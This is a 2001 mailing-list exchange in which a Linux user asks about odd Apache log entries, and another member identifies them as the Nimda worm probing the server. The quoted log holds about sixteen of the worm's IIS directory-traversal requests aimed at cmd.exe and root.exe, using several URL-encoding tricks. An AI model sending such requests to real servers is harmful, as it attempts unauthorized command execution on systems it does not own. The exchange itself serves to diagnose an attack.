Re: [newbie] found in apache logs

Tue, 02 Oct 2001 21:19:59 -0700 

Hi Jon,

That's NIMDA worm probing your system.

At 10:39 AM 10/3/01, you wrote:
>Is this some kind of worm? I found this in httpd  access logs:
>
>65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET /scripts/root.exe?/c+dir
>HTTP/1.0" 404 299 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET /MSADC/root.exe?/c+dir
>HTTP/1.0" 404 297 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET
>/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET
>/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 307 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:01 -0400] "GET
>/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET
>/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 338 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET
>/_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>HTTP/1.0" 404 338 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET
>/msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
> 
>
>HTTP/1.0" 404 354 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET
>/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:02 -0400] "GET
>/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 320 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 304 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
>65.28.52.43 - - [02/Oct/2001:21:24:03 -0400] "GET
>/scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 321 "-" "-"
>
>Want to buy your Pack or Services from MandrakeSoft?
>Go to http://www.mandrakestore.com

Jhun Bacala
New City Commercial Corporation
MIS-Dept. Davao



Want to buy your Pack or Services from MandrakeSoft? 
Go to http://www.mandrakestore.com

Reply via email to